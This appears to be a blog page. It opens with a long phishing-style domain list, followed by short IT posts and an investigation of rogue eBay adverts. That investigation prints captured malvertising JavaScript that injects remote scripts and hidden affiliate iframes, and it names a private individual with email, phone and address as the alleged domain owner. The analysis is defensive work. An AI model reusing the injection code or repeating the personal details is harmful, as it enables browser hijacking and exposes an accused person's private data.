interactbrand.com
interact-etransfert.com
international-card-services.com
internationtse.info
interponery.com
inthaeguzara.com
intwranstse.info
invalitrust.com
investec-bank.com
ishantgomal.com
ishqw.com
isqkibarish.info
istingcustom.com
isupport-technique.com
itnakuchyad.com
itumerihar.info
iweter3.com
ixups.com
izharkarna.com
jabkaygalatha.com
jaduterimzar.info
jaibwichonki.info
jamnoshkaro.info
janchurwa.com
janusinger.com
jariyanphrend.com
jasaykotesa.com
jaydadan.info
jeechotajana.com
jeenasikhaya.com
jehlamrover.com
jenailagayco.com
jeols.com
jidudilagi.com
jihidden.com
jimanicooz.com
jioniainbol.com
jiskajobhimal.com
jlebionwalasa.com
jobhishomw.com
joystickpo.com
jumangiback.com
jusaykangroz.com
kabhitoanaydo.com
kadorattmhari.com
kafiarsahuwa.com
kahanhogaja.com
kahanjyedil.com
kahchukayjo.com
kaisadijaray.com
kajlaraykaj.com
kalakurta.info
kaleencoridor.com
kalichran.com
kalimatarepor.com
kalkacomsatun.info
kalvmarchlac.com
kamnaikarda.info
kamralamba.com
kamwaliteszio.info
kancharust.com
kangnapawan.com
kanjaconma.com
kashifpackages.com
katepeterso.com
kerinoohchaedi.com
khabardarozma.com
khailoparnot.com
khairsanwala.com
khalikardain.com
khanbahadur.com
khulabilochra.com
khusbrats.com
khushboterin.info
khzanabox.com
kihalchalwa.info
kikrijanaopae.com
kilookpongaz.com
kinarakashi.info
kinarakashib.com
kinarakashido.com
kinasonarab.com
kinayjanabae.com
kindeljeep.com
kingsmentire.com
kinshaprera.com
kisikabhidy.com
kislihazsay.com
kitaynadarok.com
kitnasedhasa.com
kitnaydoorthay.info
klejabahraya.com
knetflixc.com
koehalnihaja.info
koformat.com
kotagekrican.com
koyetagladiater.info
krantiayegi.info
krantikobra.com
krishnacotlak.com
krishnacottag.com
krisnatoken.com
krizmaalover.com
krmowaretedc.com
kurikandijuti.com
kurimukargai.com
kurkurayoop.com
kurvars.com
kvmkvms.com
kwilliamz.com
kyatredypop.com
lakhakaidea.com
lakhpatibabo.com
lambogiboma.info
lathapyahosi.info
lathapyathya.info
lawfiirm.com
laykaruthunga.com
lbventure.co
lbventure.xyz
lcloudsecurity-lcloud.com
ledaysonya.com
legionhostes.com
lemorestorez.com
lenadensi.com
letmedothatz.com
letmesolvy.com
le-trasfer.com
lifetereyard.com
likedatbimp.com
limberconmerz.com
limcaopener.com
limecamelzre.com
linkineds.com
locatsigns.com
lockdevelop.com
locked-verify.com
lockwebs.com
logipanelsecu.com
loiesfnons.info
lokiorminthol.com
longtermzjerf.com
lookijump.com
lookpanels.com
lostofvlue.com
loyaltyindna.com
lsmeets.com
ls-pdf.com
lsrepu.com
lsuggestion.com
luckipanel.com
lwazmaatkesay.com
maapkainterv.com
maclearacuri.com
maedekolam.com
mahindrazoo.com
mahnors.com
mail.lbventure.xyz
mailbox201708.com
mailinfoe.com
mainkhlsep.info
mainybtayatha.com
maklawaayaha.com
maklawatola.com
managoseason.com
manicakolam.info
maphasyaajsae.com
maqsoid.com
marathikaraja.com
marceyonme.com
marchukaykd.com
marketer2017.com
maskvoter.com
maslayhotay.com
matchisues.com
maxprogs.com
maybank2online.com
medawindow.com
mehnatlarko.info
mehrunnisama.com
meradeejayla.com
merakyakaam.com
merakyakasor.com
merishradhcov.com
merizindagis.com
microsoftox365online.com
mightytex12.com
mightytex23.com
milaysedil.com
milletsupplysco.com
mincertinker.com
mindeze.info
minukiptatera.com
minutaytinu.com
missselfs.com
mmadaygo.com
mobile-clientservices.com
mobile-gouv.com
mobile-secureupdate.com
mobilityrefundbyetransfer.com
mobilityrefundetransferr.com
mobilityrefundetransferrm.com
mobilityrefundetransferrz.com
molbipolazm.com
monesyses.info
moqamoqas.com
moqapanelz.com
morzindgikay.com
motupalo.com
mrestse.info
mrlogisticse.com
msftservers.com
musheerkhas.com
musicoffmode.com
myaccountsecurity1.com
myclient1secure.com
myclient2.com
myclientsecure1.com
myhsbconlines.com
myvibomaniom.info
mzerstee.com
naimmataka.com
najaizsanband.com
nakoidarmyan.info
nameinfida.com
narmsabistar.com
navayansonya.com
navyfederalnewban.com
navyverifycation.com
nawesajanbna.com
nbdwayscloude.com
ndagihaitumer.info
neilbuild.com
neonsigin.com
netflexnew.com
newprotiles.com
newsafar.com
newsmocha.com
ngixnameserver.com
niesubjects.com
nigahaintaer.com
nikalyahasay.com
nikasaprobz.com
nilopamazop.com
nimlocos.com
ninahosts.com
nismjhtypagb.com
nityfederal.com
njrenewsi.com
noblesupports.com
nohidepors.com
nomeciforiou.com
nomiase.com
nomitits.com
nonehues.com
noneisuee.info
noneseudds.com
nooresaba.com
nopsis-serve.com
nosuperse.com
notifefocus.com
notiflax.com
notihiilo.com
nounemarocsealsales.com
nowexploies.com
nowlars.com
ns1.guideprods.com
ns1.ponamkiraat.com
ns2.area8475.pw
ns2.guideprods.com
ns2.ponamkiraat.com
nullserviy.com
nwboswali.com
offerid42426035.com
offerupmine.com
office3650-docsfilesharing.com
officejayakr.com
officelapls.com
officesupportapp.com
oinopoperz.com
okolaszinda.com
oldcustumz.com
omeriwajhasy.com
omlaorlasoray.com
onanukahota.com
onebreakmove.com
onedrivedomainsecurelogin.com
onedrivefileshare.com
onedrivefile-share.com
onedriveinc.info
one-driveinc.info
onedriveloginsecure.com
onedriveportal.com
onedriverv.com
onedrlveofflce.info
ongertelles.com
onlinecase321.com
online-check-id20012-apple.com
online-hsbcgoodwill.com
onlinelloydscredit.com
onlinemobileetransfercaf4gd7k.com
onlinemobilerefundbank.com
onlinemobility1.com
online-reactivation.org
onlines-access.com
online-servcenter.com
onlineservicessupport.com
online-signinvalidation.com
online-support-id0283423.com
online-support-idus90012-apple.com
online-support-idus900133-apple.com
onlinesypoi.com
opaeplastakc.info
opeecentrel.com
operatrezher.com
opooworld.com
orangesinfo.com
ordarls.com
ordarshope.com
orderthem.com
organixation.com
orpaonthay.com
ortokoecharabhi.info
osmkhanatha.info
otghumabola.info
otumerihar.info
oyeteranam.com
packiserver.com
palkainjhuki.com
panchhogye.com
pandaybaaz.com
pankhaniche.info
pankhaychalo.info
pastols.com
payment-booking-id.com
payment-intl.com
pdf-guard.com
pdfsauce.com
perlogsudhar.info
personalsupdates.com
pesamachine.info
phadlorecord.info
phirodhondtaa.com
pholsotkhaty.com
picasuminion.com
piddusyapa.com
pikachobana.com
pindoratests.com
pindropiz.com
pinsisures.com
plosecure.com
pluseoneserver.info
poilovers.com
polkacrezma.com
poltergiestz.com
polyonkalor.com
ponamkiraat.com
positiverootz.com
poxibiglez.com
premaconbaro.info
premiumrootz.com
pricewayi.com
primaxx.tk
priproneeded.com
privacy12.com
proddise.com
promteez.ga
propage12.com
prothidetion.com
pushusrexo.com
qabopertoz.com
qlandrkitean.info
quickbook-intuit.com
quickeinterac.com
rabakasicza.com
radiascosterz.com
radikarorzim.com
rakhpocket.com
ranglayadil.com
rashidmrayga.com
ratanlambyn.com
rebaonrli.com
receivesalies.com
reconnectsi.com
recoveproducts.com
redeoncloude.info
redirectisp.com
redirectjsp.com
ref11869.com
regrastamaz.com
regulaconovo.com
reidentifylogon.com
reminderteel.com
remitciti.com
remotrdcloude.info
replacingme.com
resortzmimba.com
retfopionex.com
rewals.com
ridertermzare.com
rishtaoplaman.com
rizlaphokayga.com
rizvialabyan.com
robanidarudar.com
robhrotport.com
rogers-acc1-login.com
rogerssetup.com
ronachahonto.info
rotikhalomini.info
rotipaygaiae.com
rowseproducts.com
rozphnekrna.com
rscotech.com
rushitums.com
rustampalwan.com
sabkikhairho.com
sadetinsoo.info
sahibokashma.com
sajantumsay.com
samartileryz.com
samokasangha.com
sandlinaina.com
sangyag.com
saninops.com
saphoness.com
sardariwala.info
sarikalnobay.info
sariraatjgaye.com
sariratbighne.info
saygeebusiness.com
sbcsr-us.com
scemehous.com
schohead.com
scoiservice.com
scoti1bnk-acclogin.com
secafters.com
secubmo.com
secure-active.ml
securebm21.com
secure-documents-uploads.com
secured-onlinex.com
secured-sec1chase.com
secureinfopage.com
secure-interca-seclink.com
securemyrbc.com
secure-onlinesignin.com
securesslinfo.com
secure-tangerine-enligne1.com
securetrans-interca5x7b3-en-seclink.com
secureyoues.com
securitiy-alerts.net
security-ac1c-log.com
security-acc-signin.com
secursonline.com
sedhisabacha.com
sendpicd.com
sertaaryou.com
serverstechna.com
serviceasi.com
setuoee.info
setupeat.com
setuprogers.com
severdatalinkin.com
shabnamkitarah.info
shaggygroup.com
shailatech.com
shakalakavoo.com
shakemilaha.com
shalldeprotine.com
shantipriyaz.com
sharacorepoz.com
sharamnhiati.info
sharedcont.com
sharmelabegum.info
sharmilamera.com
sharmproducts.com
shazilobiakyu.info
shdeerteslop.com
shedaksaeho.com
sheelakonabta.com
sherloperzinda.com
sheronmazy.com
shimlkapark.com
shimltaghtiran.com
shosuggest.com
showshowto.com
shuglalaomani.info
signsbaba.com
signspanel.com
simsombaz.com
sisfodacomana.info
sitehomeapsx.com
sixstringsw.com
slamzcoffins.com
smithsofts.com
smjhmainaya.com
smtpian.com
snbprivate.com
snthostis.com
sofazindabad.com
sohaibphansgya.com
sojabadi.com
sojaephruthk.com
soli892.com
solominesi.com
solovon.com
solubuzi.com
solusif.com
somethbrand.com
soniabchajo.com
soolitaytangya.com
spectrocoinss.com
ssdneting.com
sslbankingsecure.com
sslcertificats.com
sslinfosecured.com
standardbank-offshore.com
statsupfeeds.com
stopharras.com
storefrontzy.com
successfullyplans.com
successfulwebsx.com
sugarishell.com
sugestclient.com
suggesshop.com
suggessings.com
suggestsupdes.com
suggestupdtes.com
sugiturgent.com
sugneshost.com
sug-servers.com
sugs-server.com
sugtechupd.com
sultanbadcha.com
sunblust.com
sunrisepetorleum.com
suntrustfixa.com
superhinds.com
suporttechniques.com
supports-techniques.com
support-techniique.com
supporttechniqueaccounts.com
support-technique-canada.com
surioo.com
suspencekhan.com
suugestbuz.com
swalonkjwab.com
swissentrance.com
systemmyacount.com
tafredomanio.com
tagimertigoz.info
taintedrootz.com
takderkushae.com
talismjinder.com
tanuklaverop.com
taxtubein.info
teamsupporttechnique.com
team-technicail.com
teamtechnicals.com
technicalasupport.com
technical-teams.com
techniical-suppiort.com
tehrmtech.com
ter3rgcq.com
teramashup.com
terameranata.com
teraordars.com
teressanilam.com
teriferdonalo.com
terimerikahanii.com
teripalken.info
teritobegum.com
termiatorss.com
tertoizertvo.com
textflav.com
tgousanstse.info
thakkaybae.com
theghostwolf.com
thelengendd.com
thindachaha.info
thorasakhee.com
thugthief.com
tikkie-pay.com
timeisgoing.com
timenhihe.info
timestampsi.com
timhopes.info
tinkytanko.com
tinydocu.com
tiredofimpaiti.com
titokimaa.info
tmharakool.com
tmverifyonline.com
todocoleccions.com
tohaknhiwowa.com
tokhaybewja.com
toltahoes.info
tombraiderxz.com
tongacodex.com
topfob.com
toplpgroup.com
totalunpress.com
totalupdtech.com
trackfooz.com
tradeinfotechna.com
tradesminds.com
trafrproducts.com
tragiops.com
trandolz.tk
transcozomb.com
transfoffer.com
transprivpro.com
trasugestions.com
travelmarka.com
trboozlinkan.com
tredmilozona.com
trestaropriy.com
trivboonerz.com
trollkazima.com
trustbuildss.com
trustworthz.com
tuhibtadaymol.com
tujomeranam.com
tukounnai.com
tumeraheloch.com
tumerizerihar.info
tumharitarf.info
tumnatum.com
tunebaznaiana.com
turnachakwali.com
tusubkuchpawa.com
uberfath.com
ubersayjatatgo.info
ugestinfoes.com
uiicodes.com
uioplo.com
ujrachmanha.com
ulokapatha.info
uminerponam.com
ummerihar.info
umnalalobae.com
unemydemoz.com
unleashlimits.com
updaiting.com
updaitings.com
updateaccounts-verifications.com
updateacct.com
updatefilesin.com
updtechsnow.com
up-to-date-reri.com
uptoworkonline.com
uraibarusting.com
urlextrcts.com
urmilapooz.com
urmilaterisaki.com
user-access.org
usgranttreasury.com
usiunlited.com
usmainhunoperaz.com
ustadnutang.com
ustadpakragia.com
v2secure.com
v53i.com
vahelsign.com
vahkeioanku.com
valueofsuggestion.com
veilig-bankieren.com
velibathisan.info
verification-canada.com
verification-gouv.com
verification-secu.com
verifyamzn.com
vibusniess.com
viewdreamis.com
visehandlinf.com
vivahsajnaka.com
vividerenaz.com
vkpardanday.com
vootgen.com
vutml.com
vvebconnect.com
waatve.com
wachniyan.info
wadaraha.info
wadrekabeta.com
wahshiraees.com
waitisgood.com
wakhraswaig.info
wavesfateh.com
wavestomer.com
webadmin-mail-update.com
web-aolmail.com
webapp-mpp2.com
webmaster-service-update.com
webmobile-services.com
web-mobileservices.com
webshomes.com
welcomebrothe.com
well-quicktrans.com
wellsfargosecurelogin.com
welsfargodirectlink.com
wesolutionis.com
whitesecuredatas.com
whitespageis.com
wholefamoies.com
wickesunye.com
widgertropers.com
wiis3.com
wikjandaygwah.com
wincheaps.com
wishohadadi.com
wordspoo.com
worldcoueriservices.com
worldcourieriservice.com
worldcourieriservices.com
worldcouriersservice.com
worlddiplomaticcourier.com
worldpost-courier.com
worldwideexpresscargo.com
wrapitwellz.com
ww-etsy.com
www.armoremsid.info
www.chaskaylartiker.info
www.chichongshpang.info
www.cofepelayray.com
www.koyetagladiater.info
www.lambogiboma.info
www.myvibomaniom.info
www.onedriveinc.info
www.tagimertigoz.info
www-clhase.com
www-squareup.com
xelamar.com
xerolimited.com
yanderoosa.com
yarkoota.com
yarmangyasi.info
ychbmr7sk.com
yelodomain.com
yeropvinalert.com
yertomilano.com
yeubiope.com
yogartmoniak.info
youthwinger.com
yumlsi.com
zafarbularha.com
zamanjalis.com
zartashakona.com
zarurtsyza.com
zenderjalakota.info
zengolese.com
zindagikayala.com
zkatokamnoba.com

This article is a work in progress, some back in a day or so please. (Note to author: This is also at the top of the page!).

Posted in Uncategorized | Leave a comment

JOURNEYCALL PINGIT

Google doesn’t have much about this payment reference. So here is an article to help!

If you have applied to South West Railway / South West Trains for a Delay Repay refund on a delayed journey you will probably see the refund on your bank account as “JOURNEYCALL PINGIT”.

Journeycall are a travel payments refund management company.

Posted in Uncategorized | Leave a comment

My preferred method for deploying Adobe Flash Player on a domain.

I am mainly writing this for my own reference as I always forget the script.
Sadly I also can’t credit the person who wrote this script. I didn’t write it! And I can’t find the source of the script by Googling for keywords within the batch file.
A similar version of the script is here but isn’t as feature rich..

Deploying Adobe Flash is always a pain. Firefox blocks it by default now and Chrome seems very variable – works one day and doesn’t work the next.
Additionally while Adobe do provide an MSI download – it doesn’t actually seem to install when set as a Group Policy Installation item. I’ve always had to fall back to the .exe using the below batch file.

@echo off

:: NAME THE EXE WITH THE VERSION NUMBER

SET latestVersion=29.0.0.113
SET version=0

:CheckOS
IF EXIST "%PROGRAMFILES(X86)%" (GOTO 64BIT) ELSE (GOTO 32BIT)

:64BIT
echo 64-bit...
SET key="HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Adobe Flash Player ActiveX"
goto afteroscheck

:32BIT
echo 32-bit...
SET key="HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Adobe Flash Player ActiveX"
goto afteroscheck

:afteroscheck
:: CHECK IF FLASH AX IS INSTALLED
echo checking %key% for DisplayVersion
SET emptyTest=reg query %key% /v DisplayVersion
IF %ERRORLEVEL%==1 GOTO NOT_INSTALLED

:: CHECK IF FLASH AX IS LATEST
rem FOR /f "tokens=3 delims=	" %%# In (
rem 'reg query %key% /v DisplayVersion^|Find "REG_" 2^>Nul') Do (
rem Set "version=%%#"
rem echo Set version to %%#
rem )
rem echo Version in registry reports as %version%
rem IF %version% == %latestVersion% GOTO LATEST_VERSION

  for /f "delims=" %%i in ('reg query %key% /v DisplayVersion^|Find "REG_"') do (
    rem echo.%%i
    echo.%%i | findstr /C:%latestVersion% 1>nul
    if errorlevel 1 (
      echo not current version installed
      Set "version=notcurrent"
    ) ELSE (
      echo Already Installed
      GOTO LATEST_VERSION
    )
  )

:: SEE IF IE IS RUNNING
:IE_CHECK
TASKLIST /NH | FIND /I "iexplore.exe"
IF %ERRORLEVEL%==1 GOTO INSTALL_AX
echo.
echo.
echo Internet Explorer was detected to be running.  Adobe Flash Player installation cannot continue.
echo.
echo.
GOTO END

:NOT_INSTALLED
echo Adobe Flash Player for ActiveX not found, installing...
GOTO IE_CHECK

:INSTALL_AX
start "FlashAX" /wait "\\contoso.internal\everyone\Adobe Flash Player\install_flash_player_29_active_x.exe" -install
start "FlashPlugin" /wait "\\contoso.internal\everyone\Adobe Flash Player\install_flash_player_29_plugin.exe" -install
start "FlashChrome" /wait "\\contoso.internal\everyone\Adobe Flash Player\install_flash_player_29_ppapi.exe" -install
echo Completed installation of Adobe Flash Player version %latestVersion% for ActiveX.
GOTO END

:LATEST_VERSION
echo Version %latestVersion% of Adobe Flash Player for ActiveX is already installed.
GOTO END

:END

Remember to change latestVersion=29.0.0.113 to the version of Flash you are installing. Also change the path to the 3 installation files further down in the script.
Hope this helps someone!

Posted in Uncategorized | Leave a comment

Rogue adverts redirecting ebay visitors off-site. (d.willvox.com and www.gamiss.com/?lkid=13368106)

UPDATE: THE SAME JUNK STARTED PLAYING MUSIC! see the new article

ebay gamiss advert page

Today while browsing eBay I was taken off the eBay site several times and onto “www.gamiss.com/?lkid=13368106”. I did click click or even mouse over any advert.

I’ve seen this happen about 3 or so times in the past year with eBay but today I had time to investigate and trace what is going on.

It looks like eBay are sending visitors to an advertising partner called “pubmatic.com” who are in turn then sending the visitor to “mathtag.com”.. who are then sending advert javascript with content referencing “d.willvox.com” and “zaful.com”

ebay request 1

ebay request 2

ebay request 3

ebay request 4

ebay request 5

The most interesting parts of the exchange are….

pubmatic.com returning the following Javascript:

https://tags.mathtag.com/notify/js?exch=pub&id=5aW95q2jLzE0LyAvTTJSaU9XVTNOR1F0TlRnME5TMDROV1V5TFRBd01EQXRNREF3TURBd01EQXdNREF3LzIwMDUzNzQ4NjYyMzQ4OTkxODMvNTM0NDE2My8yOTAzNjMxLzMvTkNYN2Nkai1NMnNVcXBoLVF2b3pkMnBkaHhDbEdlZUg4R2pkdVpSOXRrcy8xLzMvMTUxOTY2NjIwMC8wLzU3OTM1Ni8xMzU5MTA5NjMyLzIwMTAwMi80NDM4MDIvMS8wLzAvTURBd01EQXdNREF0TURBd01DMHdNREF3TFRBd01EQXRNREF3TURBd01EQXdNREF3LzAvMC8wLzAvMC8yMDA1Mzc0ODY2MjM0ODk5MTgzL3pyaC8/NVxI2XsTKGxAGahgZIG3pD1Qquo&sid=2903631&cid=5344163&nodeid=1135&price=0.091&group=eu&auctionid=2005374866234899183&bp=a_ajbcci&3pck=http://clicktrack.pubmatic.com/AdServer/AdDisplayTrackerServlet?clickData=JnB1YklkPTE1NTIxMiZzaXRlSWQ9MTU1MjEzJmFkSWQ9OTUyMDE1JmthZHNpemVpZD0yMjUmdGxkSWQ9MzU0MDkzODUmY2FtcGFpZ25JZD0xNjczNSZjcmVhdGl2ZUlkPTAmYWRTZXJ2ZXJJZD0yNDMmaW1waWQ9RTQ4OTczRjYtREM2Ri00ODMyLTg1NkUtNjM5NkNCQTk1QzE4JnBhc3NiYWNrPTA=_url=

They reference tags.mathtag.com.. something to do with Math Media. An advertising agency or system.

Mathtag then send the following javascript:


<div class="script">
    
        ! function() {
            var e, t = "https://d.willvox.com",
                n = "5a40ca64fc0c4d14be22ffa8",
                r = {},
                o = {
                    10: "2005374866234899183",
                    9: "[SUBID]",
                    8: "https%3A//ebayadvertising.co.uk/",
                    7: "[LOCATION_LAT]",
                    6: "[LOCATION_LONG]",
                    5: "[DEVICEID]"
                },
                a = {
                    10: "2903631",
                    9: "5344163",
                    8: "[CUSTOM3]",
                    7: "[CUSTOM4]",
                    6: "[CUSTOM5]",
                    5: "[CUSTOM6]"
                },
                c = {
                    10: "[APP_NAME]",
                    9: "[IDFA]",
                    8: "[AID]"
                };
            try {
                for (var d = 10; d > 4;) r["z" + d] = o[d], r["c" + d] = a[d], d--;
                for (d = 10; d > 7;) r["a" + d] = c[d], d--;
                var i = m(r);

                function m(e) {
                    var t, n;
                    for (var r in "object" == typeof e && (t = ""), e) e.hasOwnProperty(r) && (t = t + "&" + r + "=" + (n = e[r], encodeURIComponent(n)));
                    return t
                }

                function p() {
                    if (window.top) return window.top;
                    for (var e = window; e.parent;) e = e.parent;
                    return e
                }

                function s() {
                    try {
                        return p().document.location.href
                    } catch (e) {
                        try {
                            return p().location.hostname
                        } catch (e) {
                            return function() {
                                try {
                                    var e = window.parent.location.ancestorOrigins;
                                    if (e && e.length >= 1) return e[e.length - 1]
                                } catch (e) {}
                            }()
                        }
                    }
                }

                function l(e) {
                    if ("" !== e.responseText) {
                        var t, n = document.createElement("div");
                        n.innerHTML = "

<div>" + e.responseText + "</div>

", n = n.firstChild, document.body.appendChild(n);
                        var r = document.getElementById("adder-inisder"),
                            o = n.getElementsByTagName("script");
                        if (o.length > 0)
                            for (var a = 0; a < o.length; ++a) {
                                u(o[a])
                            }
                        r.parentNode.appendChild(n), r.parentNode.removeChild(r)
                    } else {
                        (t = document.createElement("div")).className = "ad-serve-image", t.innerHTML = '<a>  <img src="https://d.willvox.com/ad/zaful.jpg" height="250" width="300"> </a>', document.getElementById("adder-inisder").parentNode.appendChild(t);
                        var c = document.getElementById("adder-inisder");
                        c.parentNode.removeChild(c)
                    }
                }

                function u(e) {
                    var t = document.createElement("script");
                    e && (e.text ? t.text = e.text : e.src && (t.src = e.src)), e.parentNode.appendChild(t), e.parentNode.removeChild(e)
                }

                function h() {
                    if (200 !== this.status) {
                        if ("complete" !== document.readyState) var e = setInterval(function() {
                            "complete" === document.readyState && (clearInterval(e), f())
                        }, 140);
                        "complete" === document.readyState ? f() : l(this)
                    } else l(this)
                }

                function f() {
                    try {
                        e = !(window.self === window.top)
                    } catch (t) {
                        e = !0
                    }
                    var r = t.concat("/?pid=") + n,
                        o = {};
                    e ? (o.mt = function() {
                        try {
                            return p().document.URL
                        } catch (e) {
                            try {
                                return p().frames[0].document.referrer
                            } catch (e) {}
                        }
                    }() || "", o.hn = s() || "") : (o.hn = window.location.hostname, o.mt = function() {
                        try {
                            for (var e = document.getElementsByTagName("meta"), t = 0; t <span id="mce_SELREST_start" style="overflow:hidden;line-height:0;"></span>< e.length; t++) {
                                var n = e[t];
                                if ("og:url" === n.getAttribute.property) return n.getAttribute("content")
                            }
                        } catch (e) {}
                    }() || ""), r += m(o), r += i;
                    var a = new XMLHttpRequest;
                    a.onload = h, a.open("GET", r), a.send()
                }
                f()
            } catch (e) {
                document.getElementById("adder-inisder").parentNode.removeChild(zpscript)
            }
        }();

This code looks like it is supposed to be showing the following advert: https://d.willvox.com/ad/zaful.jpg possibly if the browser doesn’t support JavaScript(?) but it also triggers yet another request to https://d.willvox.com (see the last screenshot) which responds with.

<a href="http://s.click.aliexpress.com/e/JuvRrzb?bz=120*600" target="_parent"><img width="725" height="90" src="https://ae01.alicdn.com/kf/HTB1VhqnX1GSBuNjSspb763iipXaZ/EN_728_90.png"/></a>
<img width="725" height="90" src="http://s.click.aliexpress.com/e/JuvRrzb?bz=120*600&af=[URL]&cn=[CUSTOM1]&cv=[CUSTOM2]&dp=[CB]" style="display:none;">
<iframe src="https://www.gearbest.com/promotion-8-march-special-1216.html?lkid=13364449" style="display: none"></iframe>
<iframe src="https://www.zaful.com/m-promotion-active-valentines-sale.html?innerid=35&lkid=13266105" style="display:none"></iframe>
<iframe src="https://www.gamiss.com/?lkid=13368106" style="display:none"></iframe>
<iframe src="https://www.rosegal.com/promotion-christmas-sale.html?lkid=12369082" style="display:none"></iframe>

And the deed is done. Something within the iframe for gamiss hijacks the entire page and takes you off ebay. It looks like an attempt to deploy affiliate cookies to people so that when, and if, they visit the websites referenced above and make a purchase – the person behind the junk adverts gets a kickback.

Piss poor vetting and subsequent takedown of rogue adverts. This has been a problem for at least a couple of days at this point. eBay is what I’ve seen people refer to as a “dumpster fire”. Lacking competition and drive to do things right.

Looking into the domain involved more (d.willvox.com) it seems that the following person is the owner of the domain:

Email maheshrajiv@gmail.com 
Name Thevar
Organization Mahesh
Street Address
Matunga
Mumbai
Maharashtra
400019
India

Phone 919029929719

They also own other similarly named and fishy looking domains:

addtodeal.com
alfaimpl.com
ceworldwide.in
funderspool.com
funderspool.in
grannyssecretrecipes.com
iafm.in
indiaftv.com
indiaftv.in
indianfashion.tv
internationalmediaplanet.com
juiceelement.in
mychildmyworld.com
panchakarma.online
runwayagency.com
saiproductionsbudapest.com
shivgarjana.in
squareroof.com
termzero.com
themostmodels.com
v7remedy.com
visioncorpltd.com
visioncorptv.com
visioncorptv.net
visionre.in
wildvox.com
Posted in Uncategorized | 1 Comment